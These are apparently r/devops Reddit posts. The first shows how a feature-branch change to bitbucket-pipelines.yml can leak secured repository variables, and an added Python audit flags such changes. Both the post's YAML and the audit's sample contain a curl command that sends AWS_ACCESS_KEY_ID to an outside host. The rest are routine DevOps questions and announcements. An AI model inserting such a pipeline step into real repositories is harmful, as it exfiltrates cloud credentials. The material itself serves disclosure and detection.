Reddit DevOps
(Free) Bitbucket pipelines can leak your credential

Lately I have been working with the Free version of Bitbucket Pipelines for my side project. The more I work with it, the more I see the pipeline as a security risk, especially in repositories with contractor-type devs.

So today I did some testing to confirm my hypothesis.

The project setup:
I have a repo with dev and main branches; these branches can only be merged/written to with an admin account.
We have some credentials in `Repositories Variables` and some in `Deployment Variables`. One of them is AWS_ACCESS_KEY_ID, and we have already marked it as secured in the settings.

As the bitbucket-pipelines.yml file can be changed in a feature branch, a developer can add a new pipeline rule to trigger a pipeline for that specific branch only:
ex:
```
definitions:
  steps:
    - step: &build-deploy

pipelines:
  branches:
    dev:
      - step:
          <<: *build-deploy
          deployment: staging
    master:
      - step:
          <<: *build-deploy
          deployment: production

    # start malice changes
    test-hack-pipeline:
      - step:
          script:
            - >-
              curl --header "Content-Type: application/json"
              --request POST
              --data "{\"username\":\"${AWS_ACCESS_KEY_ID}\"}"
              https://9d756c9f91e2.ngrok.io
    # end malice changes
```

With just a little bit of change, I can extract a "Repositories Variables". There is nothing to prevent me from extending that script to capture all the other environment variables.

In the case of `Deployment Variables`, those values can be protected by the premium feature called `Deployment permissions`, where we can restrict deployment variable access from unprotected branches.

So if you don't trust your devs, definitely upgrade to premium and move all credentials into `Deployment Variables`

https://redd.it/lt5eic
@r_devops
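An added detection example for the Bitbucket post above (not part of the original post): an audit meant to run outside the pipeline, for instance on push events, that compares a pushed branch's `bitbucket-pipelines.yml` with the protected branch's copy and flags new branch triggers and newly added lines that reference secured variables. The function names, the finding labels and the sample YAML are constructed for illustration.

```python
import difflib
import re

def branch_triggers(text):
    """Keys directly under `branches:` (indent scan; no YAML library needed)."""
    keys, parent, child = set(), None, None
    for line in text.splitlines():
        body = line.split("#", 1)[0].rstrip()
        if not body.strip():
            continue
        indent = len(body) - len(body.lstrip())
        if parent is None:
            if body.strip() == "branches:":
                parent = indent
            continue
        if indent <= parent:
            break  # left the branches: block
        child = indent if child is None else child
        if indent == child and body.endswith(":"):
            keys.add(body.strip()[:-1])
    return keys

def audit(base, branch, secured_vars):
    """Findings for a pushed branch's pipeline file vs. the protected branch's."""
    findings = [("new-branch-trigger", k)
                for k in sorted(branch_triggers(branch) - branch_triggers(base))]
    ref = re.compile(r"\$\{?(" + "|".join(map(re.escape, secured_vars)) + r")\b")
    for d in difflib.ndiff(base.splitlines(), branch.splitlines()):
        if d.startswith("+ "):  # line that exists only on the pushed branch
            findings += [("secured-var-in-added-line", m.group(1)) for m in ref.finditer(d)]
    return findings

# Constructed sample input, modelled on the file in the post.
BASE = """\
pipelines:
  branches:
    dev:
      - step:
          deployment: staging
    master:
      - step:
          deployment: production
"""
FEATURE = BASE + """\
    test-hack-pipeline:
      - step:
          script:
            - curl --data "${AWS_ACCESS_KEY_ID}" https://collector.example.invalid
"""
```

`audit(BASE, FEATURE, ["AWS_ACCESS_KEY_ID"])` returns one finding for the new `test-hack-pipeline` trigger and one for the added line that expands the secured variable.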
For devs looking for grants to develop apps around crypto

Just wanted to drop this here if anyone is interested. The Kin Foundation is offering grants to developers that want to join the Kin ecosystem through the catalyst fund. Why work for free when Kin will pay you and support you?

https://kin.org/catalyst-fund/

https://www.reddit.com/r/KinFoundation/

https://redd.it/lt9msx
@r_devops
Deep linking Question (in videos)

Hey, all! First time poster here. Please let me know if this is on the wrong board.

Do you guys happen to know of any meta documentation tools/platforms/plugins/etc.?

i.e. if someone were to search “marital issues” inside of our site/platform, our platform would allow us the ability to deep link into specific video timestamps where our video subjects would mention “marital issues” without playing the high-level video from the beginning.
Thanks in advance! 🙂

https://redd.it/ltatys
@r_devops
Assistance hashing out testing in CI/CD pipeline

I built this graphic primarily to help myself wrap my brain around how to implement testing in the CI/CD pipelines I'm building. Seeking assistance and input on it to see where I'm wrong, what is missing, what is / isn't necessary, etc.

https://imgur.com/a/6eMnVcd

https://imgur.com/a/PiQ9Kp0

My primary questions are the following:

1. The biggest one: Does this look right? Am I missing steps? Are any of them not necessary?
2. I really haven't quite wrapped my brain around how to do the integration testing. Really, just / and /api, and /admin and /api, need integration testing, but not 100% sure how to go about this: docker-compose, another k8s cluster in a VM like the unit tests, etc?
3. Any other suggestions?

I'm trying to implement good practices. Ours are currently... not great. We do have pipelines set up, but all of the testing is manual: test in dev, PR and deploy to staging, manual test in staging, PR and merge to production, manual testing of production.

My end goal is to have the PR trigger a pipeline to run tests and merge if they all pass, which triggers the deployment to production.

As always, I appreciate the help!

https://redd.it/lsytih
@r_devops
Alternate to AWS Fargate in Microsoft Azure

What is the alternative to AWS Fargate in Azure?

https://redd.it/lt3nf2
@r_devops
Docker like dedicated to Embedded System

Hi there! :)

I've just launched the new release of an open source and real-time embedded software named Luos.

Luos is like Docker, but dedicated to embedded systems. In other words, Luos is an open source and real-time architecture for designing, testing, and deploying embedded applications.

It could be great if you try it, and give me some feedback (I really need feedback) ➔ https://docs.luos.io

Of course I'm here if you need help :D

https://redd.it/lt1h9x
@r_devops
Observability with infrastructure as code

I recently guest wrote a post on Pulumi's website about using their Automation API to give myself much deeper insights into cloud resource creation.

I am currently using this with tooling where users can request foundational infrastructure through a web UI, where it will create all the needed bits (e.g. VPC, peerings, flow logs, authentication, and optionally a basic environment of RDS, ECS etc.) and as part of this process, it takes generated credentials and stores them in a Vault instance. The issue I had was when something failed to create, I had a hard time seeing what and why, and if something was taking longer than usual (such as a security group deletion hanging around indefinitely).

The tech used is Pulumi and Honeycomb; other providers could be used but might be more effort (e.g. parsing Terraform output to generate the spans).

https://www.pulumi.com/blog/observability-with-infrastructure-as-code/

https://redd.it/lswm6f
@r_devops
Dynatrace as a DevOps Tool

Does anyone use Dynatrace for DevOps? We are traditional devops and support the software but we are also doing internal devops. I like the tool and it does say it works well with ADO but I am only seeing developmental uses, not necessarily devops uses. Any advice would be appreciated! (2 years in devops)

https://redd.it/lt0814
@r_devops
Manual actions that you wish were automated

First time poster here, so take it easy on me! While I'm not a developer myself, I work closely with a group of team members that are strongly focused on DevOps culture. I've spent quite some time recently researching why & how companies implement DevOps methodologies. While there's so much more for me to learn, the main concept I keep coming back to is automation. Specifically how important it is to bridging the gap between development & operations, and how it significantly improves delivery of features & functionality to customers.

I'm going to continue to engage with my team members on some of the questions below, but I'm curious to hear from a larger audience:

* What are some actions you take that you wish were automated?
* Are those actions related to the general delivery pipeline, troubleshooting, or generating regular feedback?
* What's prohibited you or your team from automating those actions to reduce time & efforts?

https://redd.it/lt010g
@r_devops
SigNoz - an open source alternative to DataDog

Hi everyone! Together with my brother I've been working on SigNoz for the past few months. It's built on ReactTS and Go, and based on Kafka & druid underneath.

Here’s our github repo: https://github.com/SigNoz/signoz

As of now, we have focused on providing a seamless experience between metrics and traces, and plan to add logs in the coming months as opentelemetry logs matures (currently in alpha). SigNoz supports custom aggregates on filtered traces - and much more sophisticated filtering as we use druid underneath.

We recently released an initial version. Would love any thoughts on if this would be something which would be useful for you or how we can make it better for folks here?

https://redd.it/lsza5s
@r_devops
[Upcoming webinar] Using observability to scale AWS Lambda

In this 45-minute webinar we'll be discussing how to **utilize observability to optimize your Lambdas for scale and maintain their performance over time** - from development to production to scalability.

What you'll learn:

* How do you spot potentially **slow-running Lambda functions** and how to **power-tune them in development**?
* **Load testing** and how you need a **good observability** tool for when you do load testing. How to do load testing?
* How to use observability and **make crucial data available in production** and at scale?
* **Observability best practices** and common mistakes.
* SRE maintenance and **keeping your infrastructure performance healthy** in the long-term.

Presenters: **Ben Ellerby** (AWS serverless hero and VP of engineering at Theodo), **Alexander White**, Full-Stack Mobile and Web Engineer at Theodo and **Taavi Rehemägi**, CEO and Co-Founder at Dashbird.

RSVP here: [https://sls.dashbird.io/lambda-observability-webinar](https://sls.dashbird.io/lambda-observability-webinar)

https://redd.it/ltjumi
@r_devops
Build k8 cluster from scratch, IaC and CI/CD choice?

Hi!

I'm involved in a startup and we are going to build a new k8 cluster with Openshift Container platform on IBM cloud (don't ask why :D). The cluster will host databases, websites, mobile apps, middlelayer apps, developed with javascript, java and python. In the future we will implement kafka/event streams as well. My questions to you here:


1. What IaC tools would you use in order to manage the cluster? Been looking into terraform to manage infrastructure
2. What CI/CD tools would you use in order to connect github with kubernetes cluster?
3. What monitoring and issue trackers do you have good experiences with?
4. What IaC tools, CI/CD tools and other "DevOps" tools do you have bad experience with? Just so I know what to watch out for. Could be cost related, bugs, features, functionality etc.

All opinions are welcome. Thank you.

Best regards,
oscillate123

https://redd.it/lsyaj7
@r_devops
Chicken or the egg?

Teaching myself about devops, and I'm kind of stuck in a what-comes-first point of view. If we take a conversation at a high level of considering an aws infrastructure that's along the lines of:

* terraform managed instances
* ansible managing software installs
* kubernetes managing the microservices
* ci/cd using jenkins
* logging / metrics using elastic

It's my understanding that, in terms of setting this up:

terraform will create all the instances (the masters, workers, jenkins instance, etc). ansible will install / configure kubernetes, jenkins, elastic. jenkins will then take charge of deploying all the services to kubernetes.

Am I far off in my high level overview? Is the order of how things would happen incorrect?

https://redd.it/lsopxk
@r_devops
How do you manage the secrets that your code needs from Hashicorp Vault?

I'm assuming your Vault instance already has a lot of secrets in separate folders. Now your code needs to fetch these secrets but not all of them. Suppose you need folder1/subfolder1/secret1/key1 and folder2/subfolder2/secret2/key2.

How do you keep these dependencies in your code? Do you have something like a my_dependencies.yml which is read by your code and it queries based on that --

```
- requiredvaultsecrets:
    folder1:
      subfolder1:
        secret1:
          - key1
    folder2:
      subfolder2:
        secret2:
          - key2
```

https://redd.it/lsmomy
@r_devops
It takes me a lot longer to configure resources with code than it does in the gui

What is the problem, besides the fact that I am terrible at programming? I can't write more than four letters without looking up syntax. I can't abstract away code examples to fit my needs. I just stare at them wondering how what I am looking at could possibly have anything to do with what I need done. I hate this.

https://redd.it/ltssqb
@r_devops
How are the build and deploy processes carried out in your company?

Do you have a team of DevOps or dedicated people in charge of these processes?

And if not, then how do all these processes work for you?

https://redd.it/ltwqyl
@r_devops
Which is better for kubernetes AWS vs Azure for kubernetes?

Which is better for kubernetes AWS vs Azure for kubernetes?

https://redd.it/ltqfnl
@r_devops
Which programming language did you learn, and have you found a way to learn it by building apps?

Hello everyone! I'm in the process of trying to follow the devops roadmap, and I see several programming languages on there to get started with. Which one did you choose, and have you found a way to learn by building (rather than lectures)?

https://redd.it/ltpv6x
@r_devops
How do you decide which cloud platform to use for your next project?

I was just wondering what criteria people used to evaluate Azure, Google Cloud Platform and AWS (and any of the others I probably haven't heard of)?

Each of them has a different feature set, and of course, a completely different way of doing things, so once you have decided on one, you are pretty much stuck on that cloud as migration would be a massive task.

So how do you choose?

https://redd.it/ltmtuf
@r_devops
Does it bother anyone if a site can't work without Javascript?

I'm building an application for our external customers that lets them interact with their orders, personal information, and contracts. My intention was to build a typical SPA, with Vue.js on the front. One of my coworkers mentioned that we shouldn't use a SPA because some of our customers might be using NoScript.

Is it common to build for no-JS interactivity? It just feels like it would be a lot of duplicated work to build something that would work without JS, and then to build something that works nicer for everyone else.

https://redd.it/lu19ce
@r_devops